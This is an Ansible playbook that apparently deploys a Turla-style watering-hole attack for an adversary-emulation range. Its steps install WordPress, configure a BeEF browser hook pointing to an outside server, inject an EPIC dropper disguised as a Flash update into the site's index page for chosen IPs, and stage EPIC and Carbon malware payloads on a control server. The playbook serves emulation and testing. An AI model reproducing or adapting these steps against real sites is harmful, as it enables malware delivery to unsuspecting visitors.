---

- name: Copy Watering Hole 
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: "files/turla/Resources/setup/files/watering_hole"
    dest: "/opt"
    mode: u=rx,g=rx,o=r
    force: no

- name: Setup Word Press 
  become: yes
  become_method: sudo
  command: /bin/bash wordpress_setup.sh
  args:
    chdir: /opt/watering_hole/

- name: Run Fingerprint.py and install required packages
  become: yes
  become_method: sudo
  expect:
    command: python3 fingerprinting.py 
    responses:
      'replace beef-master/\.bundle/config.*:': "A" 
    chdir: /opt/watering_hole/
    echo: yes
    timeout: null
  async: 7200
  ignore_errors: true
  poll: 60

- name: Edit username in beef-master/config.yaml 
  become: yes
  become_method: sudo
  ansible.builtin.lineinfile:
    path: /opt/watering_hole/beef-master/config.yaml 
    regexp: '^        user:\s*"beef"'
    line: '        user: "mitre"'

- name: Edit password in beef-master/config.yaml 
  become: yes
  become_method: sudo
  ansible.builtin.lineinfile:
    path: /opt/watering_hole/beef-master/config.yaml 
    regexp: '^        passwd:\s*"beef"'
    line: '        passwd: "mitre"'

- name: Edit beef hook in beef-master/config.yaml 
  become: yes
  become_method: sudo
  ansible.builtin.lineinfile:
    path: /opt/watering_hole/beef-master/config.yaml 
    regexp: '^        hook_session_name:\s*"BEEFHOOK"'
    line: '        hook_session_name: "MITREHOOK"'

- name: Replace Local Host address with Server address
  become: yes
  become_method: sudo
  ansible.builtin.replace:
    path: /opt/watering_hole/in-range.html
    regexp: '127\.0\.0\.1\:3000'
    replace: '176.59.15.44:3000'

- name: Run ip_range.py 
  become: yes
  become_method: sudo
  command: /usr/bin/python3 ip_range.py /srv/www/wordpress/index.php 10.20.20.102 10.20.20.103 10.20.20.104 -i in-range.html 
  args:
    chdir: /opt/watering_hole/

- name: Copy Binaries to Modin 
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: "files/turla/Resources/Binaries/binaries.zip"
    dest: "/home/{{ ansible_ssh_user }}"
    force: no

- name: Unzip binaries in Modin
  no_log: true
  unarchive:
    src: "/home/{{ ansible_ssh_user }}/binaries.zip"
    dest: /home/{{ ansible_ssh_user }}/
    remote_src: yes
    extra_opts:
      - "-P"
      - "malware"

- name: Put EPIC Dropper on WordPress 
  become: yes
  become_method: sudo
  command: /usr/bin/python3 flash_prep.py /srv/www/wordpress/index.php /home/{{ ansible_ssh_user }}/wordpress/EPICDropper_http.exe 
  args:
    chdir: /opt/watering_hole/

- name: Copy PSExec To Carbon Directory 
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: "files/carbon/PsExec.exe"
    dest: "/home/{{ ansible_ssh_user }}/carbon/PsExec.exe"

- name: Rename EPICDropper_http.exe To NFVersion_5e.exe
  become: yes
  become_method: sudo
  command: mv /srv/www/wordpress/NotFlashVersion.exe /srv/www/wordpress/NTFVersion.exe

- name: Make Payload directory
  become: yes
  become_method: sudo
  ansible.builtin.file:
    path: /opt/day1/turla/Resources/payloads        
    state: directory

- name: Copy Epic Payloads to Control Server 
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: /home/{{ ansible_ssh_user }}/epic 
    dest: /opt/day1/turla/Resources/payloads/
    remote_src: yes

- name: Copy Carbon Payloads to Control Server 
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: /home/{{ ansible_ssh_user }}/carbon 
    dest: /opt/day1/turla/Resources/payloads/ 
    remote_src: yes

- name: Move Redirect Java Script
  become: yes
  become_method: sudo
  ansible.builtin.copy:
    src: /opt/watering_hole/counter.js 
    dest: /srv/www/wordpress/counter.js 
    remote_src: yes
